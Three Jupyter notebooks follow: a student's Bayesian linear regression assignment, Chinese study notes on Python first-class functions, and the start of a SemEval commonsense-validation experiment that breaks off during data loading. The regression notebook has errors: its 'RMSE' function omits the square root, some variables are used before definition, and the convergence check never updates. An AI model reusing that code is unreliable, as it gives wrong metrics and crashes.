# display_name: Python 3
# language: python
# name: python3
# ---
# Let us have a look at a more interesting data set
import numpy as np
import matplotlib.pyplot as plt
# %matplotlib inline
N = 25
X = np.linspace(0,0.9,N).reshape(N,1)
# +
def f(x):
return np.cos(10*X**2) + 0.1*np.sin(100*X)
y = f(X)
plt.figure()
plt.plot(X, y, '+')
plt.xlabel("$x$")
plt.ylabel("$y$");
# -
# ## A)
# ## For polynomial of degree K
def poly_features(X, K):
#X: inputs of size N x 1
#K: degree of the polynomial
# computes the feature matrix Phi (N x (K+1))
X = X.flatten()
N = X.shape[0]
#initialize Phi
Phi = np.zeros((N, K+1))
# Compute the feature matrix in stages
Phi = np.zeros((N, K+1))
for i in range(len(X)):
for j in range(K+1):
Phi[i,j] = X[i]**(j) ## <-- EDIT THIS LINE
return Phi
def nonlinear_features_maximum_likelihood(Phi, y):
# Phi: features matrix for training inputs. Size of N x D
# y: training targets. Size of N by 1
# returns: maximum likelihood estimator theta_ml. Size of D x 1
jitter = 0 # good for numerical stability
K = Phi.shape[1]
# maximum likelihood estimate
w_ml = np.zeros((K,1))
w_ml = np.linalg.inv(Phi.T @ Phi + jitter * np.eye(K,K)) @ (Phi.T @ y) ## <-- EDIT THIS LINE
return w_ml
# test inputs
Xtest = np.linspace(-0.3,1.3,200).reshape(-1,1)
for k in range(12):
#training part
# k is the degree of the polynomial we wish to fit
Phi = poly_features(X, k) # N x (K+1) feature matrix
w_ml = nonlinear_features_maximum_likelihood(Phi, y) # maximum likelihood estimator
# testing part
Phi_test = poly_features(Xtest, k) # N x (K+1) feature matrix
mean_pred = Phi_test @ w_ml # predicted y-values
plt.figure()
plt.plot(X, y, '+')
plt.plot(Xtest, mean_pred)
plt.xlabel("$x$")
plt.ylabel("$y$")
plt.legend(["data", "maximum likelihood fit with k = {}".format(k)]);
plt.ylim([-3,3])
# ## For trigonometric of degree K with unit frequency
def trigo_features(X, K):
#X: inputs of size N x 1
#K: degree of the polynomial
# computes the feature matrix Phi (N x (K+1))
X = X.flatten()
N = X.shape[0]
#initialize Phi
Phi = np.zeros((N, 2*K+1))
# Compute the feature matrix in stages
Phi = np.ones((N, 2*K+1))
for i in range(len(X)):
for j in range(1,K+1):
Phi[i,2*j] = np.cos(2*np.pi*j*X[i]) ## <-- EDIT THIS LINE
Phi[i,2*j-1] = np.sin(2*np.pi*j*X[i]) ## <-- EDIT THIS LINE
return Phi
# test inputs
Xtest = np.linspace(-0.3,1.3,200).reshape(-1,1)
for k in range(12):
#training part
# k is the degree of the polynomial we wish to fit
Phi = trigo_features(X, k) # N x (K+1) feature matrix
w_ml = nonlinear_features_maximum_likelihood(Phi, y) # maximum likelihood estimator
# testing part
Phi_test = trigo_features(Xtest, k) # N x (K+1) feature matrix
mean_pred = Phi_test @ w_ml # predicted y-values
plt.figure()
plt.plot(X, y, '+')
plt.plot(Xtest, mean_pred)
plt.xlabel("$x$")
plt.ylabel("$y$")
plt.legend(["data", "maximum likelihood fit with k = {}".format(k)]);
plt.ylim([-3,3])
# ## b)
# ## repeat the previous part
# test inputs
Xtest = np.linspace(-1,1.2,200).reshape(-1,1)
for k in range(12):
#training part
# k is the degree of the polynomial we wish to fit
Phi = trigo_features(X, k) # N x (K+1) feature matrix
w_ml = nonlinear_features_maximum_likelihood(Phi, y) # maximum likelihood estimator
# testing part
Phi_test = trigo_features(Xtest, k) # N x (K+1) feature matrix
mean_pred = Phi_test @ w_ml # predicted y-values
plt.figure()
plt.plot(X, y, '+')
plt.plot(Xtest, mean_pred)
plt.xlabel("$x$")
plt.ylabel("$y$")
plt.legend(["data", "maximum likelihood fit with k = {}".format(k)]);
plt.ylim([-3,3])
def RMSE(y, ypred):
rmse = sum((y - ypred)**2)/y.shape[0] ## <-- EDIT THIS LINE
return rmse
# +
K_max = 10
rmse_train = np.zeros((K_max+1,))
sigma = np.zeros((K_max+1,))
for k in range(K_max+1):
Phi = poly_features(X, k)
w_ml = nonlinear_features_maximum_likelihood(Phi, y)
Phi_test = trigo_features(Xtest, k)
y_pred = Phi @ w_ml
rmse_train[k] = RMSE(y, y_pred) # <-- EDIT THIS LINE
#sigma = y_pred/(X.shape[0])
#plt.plot(sigma)
plt.figure()
plt.plot(rmse_train)
plt.xlabel("degree of polynomial")
plt.ylabel("RMSE");
# -
def leave_one_out(X):
data = list(X)
result = []
for i in range(len(data)):
data.remove(data[i])
result.append(np.array(data))
data = list(X)
return result
# +
k=1
N = X.shape[0]
error = []
errors = []
for j in range(len(leave_one_out(X))):
#training part
# k is the degree of the polynomial we wish to fit
training_data = leave_one_out(X)[j]
test_data = leave_one_out(y)[j]
Phi = trigo_features(training_data, k) # N x (2K+1) feature matrix
w_ml = nonlinear_features_maximum_likelihood(Phi, test_data) # maximum likelihood estimator
# testing part
Phi_test = trigo_features(X[j], k) # N x (K+1) feature matrix
mean_pred = Phi_test @ w_ml # predicted y-values
err = (y[j] - mean_pred)[0][0]
error.append(err*err )
errors.append(sum(error)/N)
# +
K_max = 10
rmse_train = np.zeros((K_max+1,))
sigma = np.zeros((K_max+1,))
errors = []
Xtest = np.linspace(-1,1.2,25).reshape(-1,1)
ytest = f(Xtest)
for k in range(K_max+1):
#train
Phi = trigo_features(X, k)
w_ml = nonlinear_features_maximum_likelihood(Phi, y)
#test
Phi_test = trigo_features(Xtest, k)
#w_ml = nonlinear_features_maximum_likelihood(Phi_test, ytest)
y_pred = Phi @ w_ml
# prediction (test set)
#ypred_test = Phi_test @ w_ml
rmse_train[k] = RMSE(y, y_pred) # <-- EDIT THIS LINE
###########################################################
N = X.shape[0]
error = []
for j in range(len(leave_one_out(X))):
#training part
# k is the degree of the polynomial we wish to fit
training_data = leave_one_out(X)[j]
test_data = leave_one_out(y)[j]
Phi = trigo_features(training_data, k) # N x (2K+1) feature matrix
w_ml = nonlinear_features_maximum_likelihood(Phi, test_data) # maximum likelihood estimator
# testing part
Phi_test = trigo_features(X[j], k) # N x (K+1) feature matrix
mean_pred = Phi_test @ w_ml # predicted y-values
err = (y[j] - mean_pred)[0][0]
error.append(err*err )
errors.append(sum(error)/N)
errors = np.array(errors)
#print(errors)
plt.figure()
plt.plot(errors)
plt.plot(rmse_train)
plt.xlabel("degree of polynomial")
plt.ylabel("MSE")
plt.legend(["MSE", "$\sigma^2_{MLE}$"]);
# -
t=[j for j in range(25)]
leav=leave_one_out(t)
def Gaussian_features(X, K):
#X: inputs of size N x 1
#K: degree of the polynomial
# computes the feature matrix Phi (N x (K+1))
X = X.flatten()
mu = np.linspace(0,1,K+1).reshape(-1,1)
scale = 0.1
N = X.shape[0]
#initialize Phi
Phi = np.zeros((N, K+1))
# Compute the feature matrix in stages
for i in range(len(X)):
for j in range(K+1):
Phi[i,j] = np.exp(-((X[i] - mu[j])**2)/(2*(scale**2))) ## <-- EDIT THIS LINE
return Phi
def loss_function(w_map, lamda):
value = np.linalg.norm(y - (Phi @ w_map))**2 + lamda*(np.linalg.norm(w_map)**2)
return value
def nonlinear_features_maximum_a_posteriori(Phi, y, lamda):
# Phi: features matrix for training inputs. Size of N x D
# y: training targets. Size of N by 1
# returns: maximum likelihood estimator theta_ml. Size of D x 1
#jitter = 0 # good for numerical stability
K = Phi.shape[1]
# maximum likelihood estimate
w_ml = np.zeros((K,1))
w_ml = np.linalg.inv(Phi.T @ Phi + lamda * np.eye(K,K)) @ (Phi.T @ y) ## <-- EDIT THIS LINE
return w_ml
# +
#lamdas = np.random.rand(3)
lamdas = [1e-12, 1, 50]
Xtest = np.linspace(-0.3,1.3,200).reshape(-1,1)
for lamda in lamdas :
K = 20
rsf = np.zeros(K+1)
#for k in range(K):
Phi = Gaussian_features(X, K)
w_map = nonlinear_features_maximum_a_posteriori(Phi, y, lamda)
Phi_test = Gaussian_features(Xtest, K)
y_pred = Phi_test @ w_map
plt.plot(Xtest, y_pred)
plt.ylim([-1.2,2])
#rsf[k] = loss_function(w_map, lamda)
plt.plot(X,y, '+')
# +
#lamdas = np.random.rand(3)
lamdas = [0.4, 1, 9]
for lamda in lamdas :
K = 20
rsf = np.zeros(K+1)
for k in range(K):
Phi = Gaussian_features(X, k)
w_map = nonlinear_features_maximum_a_posteriori(Phi, y, lamda)
rsf[k] = loss_function(w_map, lamda)
#rsf = np.array(rsf)
#print(rsf.shape)
plt.figure()
plt.plot(rsf)
plt.xlabel("w")
#plt.ylabel("")
plt.legend(["$\lambda$ = {}".format(lamda)]);
# -
# ## 3) Bayesian Linear Regression
def lml(alpha, beta, Phi, Y):
N = Y.shape[0]
A = alpha * (Phi @ Phi.T) + beta*np.eye(N)
lml = (-N * np.log(2*np.pi) - np.log(abs(np.linalg.det(A))) - Y.T @ (np.linalg.inv(A+ 1e-08*np.eye(A.shape[0])) @ Y))/2
return lml
# +
# randomly initialize a value to x
N = 25
X = np.linspace(0,0.9,N).reshape(N,1)
Y = f(X)
Phi = poly_features(X, 1)
lml(0.1, 0.1, Phi, Y)
# -
def grad_lml(alpha, beta, Phi, Y):
N = Y.shape[0]
A = alpha * (Phi @ Phi.T) + beta*np.eye(N)
alpha_grad = (Y.T @ (np.linalg.inv(A) @ Phi @ Phi.T @ np.linalg.inv(A) @ Y) - np.trace(np.linalg.inv(A) @ Phi @ Phi.T))/2
beta_grad = (Y.T @ (np.linalg.inv(A) @ np.linalg.inv(A)) @ Y - np.trace(np.linalg.inv(A)))/2
return (alpha_grad, beta_grad)
grad_lml(0.1, 0.1, Phi, Y)
# +
# set up a stepsize
learning_rate = 0.01
# randomly initialize a value to X
N = 25
X = np.linspace(0,0.9,N).reshape(N,1)
Y = f(X)
Phi = poly_features(X, 1)
np.random.seed(4)
previous_alpha = np.random.rand(1)
previous_beta = np.random.rand(1)
# set up a number of iteration
epoch = 1000
# +
def gradient_descend(previous_alpha, previous_beta, learning_rate, epoch):
# define the objective function f(alpha, beta) = lml(alpha, beta, Phi, Y)
# define the gradient of lml : grad_lml(alpha, beta, Phi, Y)
iters = 0
previous_step_size = 1
precision = 0.00001
# randomly initialize values
Alpha = np.zeros(epoch)
Beta = np.zeros(epoch)
#log_marg_lik = []
log_marg_lik = np.zeros(epoch).astype('float')#np.array([0 for i in range(counter)],dtype=float)
#Alpha[0] = previous_alpha
#Beta[0] = previous_beta
# gradient descent method to find the minimum
while (previous_step_size > precision) & (iters < epoch):
#for i in range(epoch-1):
grad = grad_lml(previous_alpha, previous_beta, Phi, Y)
current_alpha = previous_alpha + learning_rate*grad[0]
current_beta = previous_beta + learning_rate*grad[1]
Alpha[iters] = current_alpha
Beta[iters] = current_beta
previous_step = max(abs(current_alpha- previous_alpha), abs(current_beta-previous_beta))
# update previous_x and previous_y
previous_alpha = current_alpha
previous_beta = current_beta
iters += 1
#print(Alpha)
for i in range(epoch):
log_marg_lik[i] = lml(Alpha[i], Beta[i], Phi, Y)[0][0]
alpha_max = Alpha[log_marg_lik.argmax()]
beta_max = Beta[log_marg_lik.argmax()]
print(alpha_max, beta_max)
# plt.figure()
# plt.plot(log_marg_lik)
# plt.xlabel("Number of iterations")
# plt.ylabel("y")#'''
# #plt.legend(["$\theta$"])
#return (alpha_max, beta_max)
return (Alpha, Beta, log_marg_lik)
# -
Alpha, Beta, log_marg_lik = gradient_descend(alpha, beta, learning_rate, epoch)
# +
#log_marg_lik = np.zeros(epoch).astype('float')
# for i in range(epoch):
# log_marg_lik[i] = lml(Alpha[i], Beta[i], Phi, Y)[0][0]
plt.figure()
plt.plot(log_marg_lik)
plt.xlabel("Number of iterations")
plt.ylabel("y")
# -
Alpha, Beta, log_marg_lik = gradient_descend(previous_alpha, previous_beta, learning_rate, epoch)
# +
import matplotlib.pyplot as plt
from matplotlib import animation
from mpl_toolkits.mplot3d import Axes3D
# -
np.random.seed(4)
# randomly initialize values
alpha = 1
beta = 1
learning_rate = 0.01
epoch = 500
alpha_gd, beta_gd,_ = gradient_descend(alpha, beta, learning_rate, epoch)
alpha_max = alpha_gd[np.array(lml_gd).argmax()]
beta_max = beta_gd[np.array(lml_gd).argmax()]
print(alpha_max, beta_max)
# +
''' Plot our function '''
N = 150
a = np.linspace(0.001,1,N).reshape(N,1)
b = np.linspace(0.001,1,N).reshape(N,1)
x, y = np.meshgrid(a, b)
n = x.shape
z = np.zeros(n)
for i in range(n[0]):
for j in range(n[0]):
z[i,j] = max(lml(x[i,j], y[i,j], Phi, Y), -30)
fig1, ax1 = plt.subplots()
#ax1.contour(x, y, z, levels=np.logspace(-3, 3, N), cmap='jet')
ax1.contour(x, y, z, cmap='jet', levels=np.linspace(np.min(z), np.max(z), 28))
# Plot target (the minimum of the function)
#min_point = np.array([0., 0.])
#max_point = np.array([alpha_max,beta_max])
#max_point_ = max_point[:, np.newaxis]
#print(max_point_)
#min_point_ = min_point[np.newaxis,:]
#ax1.plot(alpha_max, beta_max, 'r*', markersize=10)
#ax1.plot(*max_point_, lml(x[i,j], y[i,j], Phi, Y), 'r*', markersize=10)
ax1.set_xlabel(r'x')
ax1.set_ylabel(r'y')
# #%matplotlib inline
alpha_gd = np.array(alpha_gd)
beta_gd = np.array(beta_gd)
ax1.plot(alpha_gd, beta_gd, 'bo')
for i in range(1, epoch):
ax1.annotate('', xy=(alpha_gd[i], beta_gd[i]), xytext=(alpha_gd[i-1], beta_gd[i-1]),
arrowprops={'arrowstyle': '->', 'color': 'r', 'lw': 1},
va='center', ha='center')
plt.ylim(0, 1)
plt.xlim(0, 1)
plt.show()
#*min_point_, func_z(*min_point_)
# +
## alpha_gd, beta_gd, lml_gd = gradient_decent(alpha, beta, learning_rate, epoch)
# -
# ## C)
# +
# set up a stepsize
learning_rate = 0.01
# randomly initialize a value to X
N = 25
X = np.linspace(0,0.9,N).reshape(N,1)
Y = f(X)
Phi = poly_features(X, 1)
np.random.seed(4)
previous_alpha = np.random.rand(1)
previous_beta = np.random.rand(1)
# set up a number of iteration
epoch = 1000
# -
Kmax = 11
max_values = []
#learning_rate = 1e-7
for i in range(Kmax+1):
Phi = trigo_features(X, i)
alpha_max, beta_max, b= gradient_descend(previous_alpha, previous_beta, learning_rate, epoch)
#max_values.append(lml(alpha_max, beta_max, Phi, Y)[0][0])
max_values.append(max(b))
print(max_values)
max_values = np.array(max_values)
orders = np.array([order for order in range(Kmax+1)])
plt.figure()
plt.plot(orders, max_values)
plt.xlabel("order of basis fucntion")
plt.ylabel("maximum of the lml")
max_values
Phi = trigo_features(X, 2)
alpha_max, beta_max = gradient_descend(previous_alpha, previous_beta, learning_rate, epoch)
print(lml(alpha_max, beta_max, Phi, Y)[0][0])
def Gaussian_features(X, K):
#X: inputs of size N x 1
#K: degree of the polynomial
# computes the feature matrix Phi (N x (K+1))
X = X.flatten()
mu = np.linspace(-0.5,1,10).reshape(10,1)
scale = 0.1
N = X.shape[0]
#initialize Phi
Phi = np.zeros((N, K+1))
# Compute the feature matrix in stages
for i in range(len(X)):
for j in range(K+1):
Phi[i,j] = np.exp(-((X[i] - mu[j-1])**2)/(2*(scale**2))) ## <-- EDIT THIS LINE
return Phi
# +
K =10
alpha = 1
beta = 0.1
Phi = Gaussian_features(X,K)
# N = 25
variance = np.linalg.inv(1/alpha*np.identity(11) + 1/beta*Phi.T @ Phi)
mean = variance @ (1/beta* Phi.T @ y).flatten()
sample = np.random.multivariate_normal(mean,variance, size=5)
Phi_test = Gaussian_features(Xtest, K)
for i in range(5):
y_pred = Phi_test @ sample[i]
plt.plot(Xtest, y_pred)
# plot the posterior
# plt.figure()
# plt.plot(X, y, "+")
# plt.plot(Xtest, m_mle_test)
# plt.plot(Xtest, m_map_test)
mean_blr = Phi_test @ mean
cov_blr = Phi_test @ variance @ Phi_test.T
var_blr = np.diag(cov_blr)
conf_bound1 = np.sqrt(var_blr).flatten()
conf_bound2 = 2.0*np.sqrt(var_blr).flatten()
conf_bound3 = 2.0*np.sqrt(var_blr).flatten() + 2.0*beta
plt.fill_between(Xtest.flatten(), mean_blr.flatten() + conf_bound1,
mean_blr.flatten() - conf_bound1, alpha = 0.1, color="k")
plt.fill_between(Xtest.flatten(), mean_blr.flatten() + conf_bound2,
mean_blr.flatten() - conf_bound2, alpha = 0.1, color="k")
plt.fill_between(Xtest.flatten(), mean_blr.flatten() + conf_bound3,
mean_blr.flatten() - conf_bound3, alpha = 0.1, color="k")
plt.legend(["Training data", "MLE", "MAP", "BLR"])
plt.xlabel('$x$');
plt.ylabel('$y$');
# -
def gradient_decent(previous_alpha, previous_beta, learning_rate, epoch):
alpha_gd = []
beta_gd = []
lml_gd = []
# randomly initialize a value to X
N = 25
X = np.linspace(0,0.9,N).reshape(N,1)
Y = f(X)
Phi = poly_features(X, 1)
alpha_gd.append(previous_alpha[0])
beta_gd.append(previous_beta[0])
lml_gd.append(lml(previous_alpha, previous_beta, Phi, Y))
# begin the loops to update x, y and z
for i in range(epoch):
grad = grad_lml(previous_alpha, previous_beta, Phi, Y)
current_alpha = previous_alpha - learning_rate*grad[0]
alpha_gd.append(current_alpha[0][0])
current_beta = previous_beta - learning_rate*grad[1]
beta_gd.append(current_beta[0][0])
lml_gd.append(lml(current_alpha, current_beta, Phi, Y))
# update previous_x and previous_y
previous_alpha = current_alpha
previous_beta = current_beta
return alpha_gd, beta_gd, lml_gd
| Machine-Learning-Codes/Third assignment-Bayesian_Linear_Regression/.ipynb_checkpoints/coding_answers-Copy1-checkpoint.ipynb |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # 一等函数
#
# 函数是一等对象。
#
# ## 一等对象
#
# 一等对象:
# - 在运行时创建
# - 能赋值给变量或数据结构中的元素
# - 能作为参数传给函数
# - 能作为函数的返回结果
#
#
# +
def factorial(n):
'''return n!'''
return 1 if n < 2 else n * factorial(n-1)
# 将函数看作是对象传入方法中:
list(map(factorial, range(11)))
# -
dir(factorial)
#
# ## 可调用对象
#
# - 用户定义的函数 : def或lambda
# - 内置函数
# - 内置方法
# - 方法:在类的定义体内定义的函数
# - 类:\_\_new\_\_:创建一个实例;\_\_init\_\_初始化实例。\_\_call\_\_实例可以作为函数调用
# - 生成器函数: yield的函数或方法,返回生成器对象(14章)
# +
# callable
import random
class BingoCage:
def __init__(self, items):
self._items = list(items)
random.shuffle(self._items)
def pick(self):
try:
return self._items.pop()
except IndexError:
raise LookupError('pick from an empty BingCage')
def __call__(self):
'''
The class is callable only on defined the __call__ function
'''
return self.pick()
bingo = BingoCage(range(3))
bingo.pick()
# -
bingo()
callable(bingo)
dir(BingoCage)
# ## 函数内省
# +
class C:pass #自定义类
obj = C() #自定义类实例
def func():pass #自定义函数
sorted( set(dir(func)) - set(dir(obj))) #求差集
# -
# ### 函数专有的属性
# | 名称 | 类型 | 说明 |
# |:--------------------|:----|:----|
# | \_\_annotations\_\_ | dict |参数和返回值的注解 |
# |\_\_call\_\_ |method-wrapper|实现()运算符;即可调用对象协议|
# |\_\_closure\_\_ |tuple|函数闭包,即自由变量的绑定(通常是None)|
# |\_\_code\_\_ |code|编译成字节码的函数元数据和函数定义体
# |\_\_defaults\_\_ |tuple|形式参数的默认值
# |\_\_get\_\_ |method-wrapper|实现只读描述符协议(20章)
# |\_\_globals\_\_ |dict|函数所在模块中的全局变量
# |\_\_kwdefaults\_\_ |dict|仅限关键字形式参数的默认值
# |\_\_name\_\_ |str|函数名称
# |\_\_qualname\_\_ |str|函数的限定名称
# ## 函数参数
#
# - 仅限关键字参数
# - 使用\*存无变量名的一个或以上个参数到元组中
# - 使用\**存有变量名的一个或以上个参数到字典中
#
#
#
#
#
def tag(name, *content, cls=None, **attrs):
"""生成一个或多个HTML标签"""
if cls is not None:
attrs['class'] = cls
if attrs:
attr_str = ''.join(' %s="%s"'%(attr, value)
for attr, value
in sorted(attrs.items()))
else:
attr_str = ''
if content:
return '\n'.join('<%s%s>%s</%s>'%(name, attr_str, c, name)
for c in content)
else:
return '<%s%s />'%(name, attr_str)
# 传入单个定位参数,生成一个指定名称的空标签。
# name = 'br'
tag('br')
# 第一个参数后面的任意个参数会被 *content 捕获,存入一个元组。
# name = 'p'
# content = ('hello')
tag('p', 'hello')
# name = 'p'
# content = ('hello', 'world')
tag('p', 'hello', 'world')
# +
# tag 函数签名中没有明确指定名称的关键字参数会被 **attrs 捕 获,存入一个字典。
# name = 'p'
# content = ('hello')
# attrs['id'] = 33
tag('p', 'hello', id=33)
# +
# cls 参数只能作为关键字参数传入。
# name = 'p'
# content = ('hello', 'world')
# cls = 'sidebar'
print(tag('p', 'hello', 'world', cls='sidebar'))
# +
# 调用 tag 函数时,即便第一个定位参数也能作为关键字参数传入。
# name = 'img'
# attrs['content'] = 'testing'
tag(content='testing', name="img")
# +
# 在 my_tag 前面加上 **,字典中的所有元素作为单个参数传入,
# 同名键会绑定到对应的具名参数上,余下的则被 **attrs 捕获。
# name = 'img'
# attrs['title'] = 'Sunset Buolevard'
# attrs['src'] = 'sunset.jpg'
# cls = 'framed'
my_tag = {'name':'img', 'title':'Sunset Buolevard',
'src':'sunset.jpg', 'cls':'framed'}
tag(**my_tag)
# -
# 定义函数 时若想指定仅限关键字参数(如上面参数中的 *cls*),要把它们放到前面有 \* 的参数后面。如果不想支持数量不定的定位参数,但是想支持仅限关键字参数,在签名中 放一个 \*,如下所示:
# +
def f(a, *, b):
return a,b
f(1, b=2) # b参数必须指定设置了
# -
# # 获取关于参数的信息
#
# +
def clip(text, max_len = 80):
"""
在max_len前面或后面的第一个空格处截断文本
"""
end = None
if len(text) > max_len:
space_before = text.rfind(' ', 0, max_len)
if space_before >= 0:
end = space_before
else:
space_after = text.rfind(' ', max_len)
if space_after >= 0:
end = space_after
if end == None:
end = len(text)
return text[:end].rstrip()
clip('I will learn python by myself every night.', 18)
# -
'''
函数对象:
__defaults__: 定位参数和关键字参数的默认值元组
__kwdefaults__:仅限关键字参数默认值元组
参数的默认值只能通过它们在 __defaults__ 元组中的位置确定,
因此要从后向前扫描才能把参数和默认值对应起来。
在这个示例中 clip 函数有两个参数,text 和 max_len,
其中一个有默认值,即 80,因此它必然属于最后一个参数,即max_len。这有违常理。
'''
clip.__defaults__
"""
__code__.varname:函数参数名称,但也包含了局部变量名
"""
clip.__code__.co_varnames
"""
__code__.co_argcount:结合上面的变量,可以获得参数变量
需要注意,这里返回的数量是不包括前缀*或**参数的。
"""
clip.__code__.co_argcount
# ## 使用inspect模块提取函数签名
# +
from inspect import signature
sig = signature(clip)
sig
# -
for name, param in sig.parameters.items():
print (param.kind, ":", name, "=", param.default)
# 如果没有默认值,返回的是inspect.\_empty,因为None本身也是一个值。
# | kind | meaning |
# | :--- | ------: |
# |POSITIONAL_OR_KEYWORD | 可以通过定位参数和关键字参数传入的形参(多数) |
# |VAR_POSITIONAL| 定位参数元组 |
# |VAR_KEYWORD| 关键字参数字典 |
# |KEYWORD_ONLY| 仅限关键字参数(python3新增) |
# |POSITIONAL_ONLY| 仅限定位参数,python声明函数的句法不支持 |
# # 函数注解
"""
没有设置函数注解时,返回一个空字典
"""
clip.__annotations__
def clip_ann(text:str, max_len:'int > 0' = 80) -> str:
"""
在max_len前面或后面的第一个空格处截断文本
"""
end = None
if len(text) > max_len:
space_before = text.rfind(' ', 0, max_len)
if space_before >= 0:
end = space_before
else:
space_after = text.rfind(' ', max_len)
if space_after >= 0:
end = space_after
if end == None:
end = len(text)
return text[:end].rstrip()
clip_ann.__annotations__
# Python 对注解所做的唯一的事情是,把它们存储在函数的
# __annotations__ 属性里。仅此而已,Python 不做检查、不做强制、
# 不做验证,什么操作都不做。换句话说,注解对 Python 解释器没有任何 意义。注解只是元数据,可以供 IDE、框架和装饰器等工具使用。
# # 函数式编程
#
# 涉及到两个包:
# - operator
# - functools
# ## operator
# ### 使用mul替代* (相乘)运算符
# +
# 如何将运算符当作函数使用
# 传统做法:
from functools import reduce
def fact(n):
return reduce(lambda a,b: a*b, range(1,n+1))
fact(5)
# +
# 如果使用operator库,就可以避免使用匿名函数
from functools import reduce
from operator import mul
def fact_op(n):
return reduce(mul, range(1,n+1))
fact_op(5)
# -
# ### 使用itemgetter来代表[ ]序号运算符
# +
metro_data = [
('Tokyo', 'JP', 36.933, (35.689722, 139.691667)),
('Delhi NCR', 'IN', 21.935, (28.613889, 77.208889)),
('Mexico City', 'MX', 20.142, (19.433333, -99.133333)),
('New York-Newark', 'US', 20.104, (40.808611, -74.020386)),
('Sao Paulo', 'BR', 19.649, (-23.547778, -46.635833)),
]
from operator import itemgetter
for city in sorted(metro_data, key = itemgetter(1)):
print(city)
# 这里的itemgetter(1)等价于 lambda fields:fields[1]
# -
cc_name = itemgetter(1,0) # 将返回提取的值构成的元组
for city in metro_data:
print( cc_name(city) )
# ### 使用attrgetter获取指定的属性,类似ver.attr(点运算符)
# +
from collections import namedtuple
metro_data = [
('Tokyo', 'JP', 36.933, (35.689722, 139.691667)),
('Delhi NCR', 'IN', 21.935, (28.613889, 77.208889)),
('Mexico City', 'MX', 20.142, (19.433333, -99.133333)),
('New York-Newark', 'US', 20.104, (40.808611, -74.020386)),
('Sao Paulo', 'BR', 19.649, (-23.547778, -46.635833)),
]
LatLog = namedtuple('LatLong','lat long')
Metropolis = namedtuple('Metropolis', 'name cc pop coord')
metro_areas = [Metropolis(name, cc, pop, LatLog(lat, long)) for name, cc
, pop, (lat, long) in metro_data]
# 点运算符
metro_areas[0].coord.lat
# +
# 使用operator函数来代替操作符
from operator import attrgetter
name_lat = attrgetter('name', 'coord.lat')
# 用坐标lat排序
for city in sorted(metro_areas, key = attrgetter('coord.lat')):
print(name_lat(city))
# -
# ### methodcaller为参数调用指定的方法
# +
from operator import methodcaller
s = 'The time has come'
# 可以把upcase看作是一个创建出来的函数
upcase = methodcaller('upper')# 指定方法
upcase(s)
# +
# 冻结参数:replace(str, ' ', '-')--->部分应用
hiphenate = methodcaller('replace', ' ','-')
hiphenate(s)
# -
# ### operator 中的函数列表
import operator
funcs = [name for name in dir(operator) if not name.startswith('_')]
for func in funcs:
print(func)
# ## functools
# ### functools.partial 冻结参数
#
# partial 的第一个参数是一个可调用对象,后面跟着任意个要绑定的 定位参数和关键字参数。
# +
from operator import mul
from functools import partial
# 将mul(a,b)的一个参数冻结为3
triple = partial(mul, 3)
triple(7)
# -
# 当参数只接受只有一个参数的函数时
list(map(triple,range(1,10)))
# ### functools.partial 规范化函数
# +
# 在需要经常使用的一些函数时,我们可以将其作为一个冻结变量,会更加方便
import unicodedata, functools
# 提炼常用函数 unicodedata.normalize('NFC',s)
nfc = functools.partial(unicodedata.normalize, 'NFC')
s1 ='café'
s2 = 'cafe\u0301'
s1 == s2
# -
nfc(s1) == nfc(s2)
# +
def tag(name, *content, cls=None, **attrs):
"""生成一个或多个HTML标签"""
if cls is not None:
attrs['class'] = cls
if attrs:
attr_str = ''.join(' %s="%s"'%(attr, value)
for attr, value
in sorted(attrs.items()))
else:
attr_str = ''
if content:
return '\n'.join('<%s%s>%s</%s>'%(name, attr_str, c, name)
for c in content)
else:
return '<%s%s />'%(name, attr_str)
# 将tag函数参数进行部分冻结,使用将更方便:
from functools import partial
picture = partial(tag, 'img', cls='pic-frame')
picture(src = 'wum.jpeg')
# -
picture
picture.func
tag
picture.args
picture.keywords
| FluentPython/.ipynb_checkpoints/Chapter05OriginsFunction-checkpoint.ipynb |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # Experiment on Subtask A: Validation
# Updated on August 20, 2021.
#
# #### Project Information:
# * Summer Project: Commonsense Validation and Explanation in Natural Language Processing<br>
# * Objective Task: SemEval 2020 Task 4 - Commonsense Validation and Explanation (ComVE)<br>
# * Supervisor: Dr <NAME><br>
# * Student: <NAME> (2214560)
#
# #### Task Description:
# The subtask A is a validation task. The purpose is to determine which of two similar natural language statements is against common sense.
#
# *Example:*
# > Task: Which of the two statements is against common sense?
# > Statement1: He put a turkey into the fridge.
# > Statement2: He put an elephant into the fridge.
#
# #### Solution:
# The experiment will follow the steps:
# 1. General Preparation
# 2. Data Processing
# 3. Loading the Model and Optimizer
# 4. Training and Evaluation
# 5. Experiment
# <!-- #### Task Description:
# The subtask A is a validation task. The purpose is going to tell which of two similar natural language statements is against common sense.
#
# *Example:*
#
# Task: Which statement of the two is against common sense?
# Statement1: He put a turkey into the fridge.
# Statement2: He put an elephant into the fridge. -->
# ## 1. General Preparation
# Import some common libraries.
from tqdm import tqdm
import time
# Use GPU Facilities.
import torch
cuda_id = 3
device = torch.device("cuda:%s" % cuda_id if torch.cuda.is_available() else "cpu")
device_name = torch.cuda.get_device_name(cuda_id) if torch.cuda.is_available() else "cpu"
print("We are using the device %s - %s" % (device, device_name))
# Use TensorBoard to record and visualize the results of the experiment.
# +
from torch.utils.tensorboard import SummaryWriter
# Set TensorBoard
writer_tensorboard = SummaryWriter('./TensorBoard/SubtaskA')
# -
# ## 2. Data Processing
# ### 2.1 Read data from csv
# Build a common function to get texts and labels from csv file.
import pandas as pd
def get_info_from_csv(texts_path, labels_path):
texts = pd.read_csv(texts_path, header=0, names=['ID', 'Statement 0', 'Statement 1'])
labels = pd.read_csv(labels_path, header=None, names=['ID', 'Answer'])['Answer']
return texts, labels
# Read texts and labels from csv file.
# +
train_texts, train_labels = get_info_from_csv(
'../DataSet/Training Data/subtaskA_data_all.csv',
'../DataSet/Training Data/subtaskA_answers_all.csv'
)
val_texts, val_labels = get_info_from_csv(
'../DataSet/Dev Data/subtaskA_dev_data.csv',
'../DataSet/Dev Data/subtaskA_gold_answers.csv'
)
test_texts, test_labels = get_info_from_csv(
'../DataSet/Test Data/subtaskA_test_data.csv',
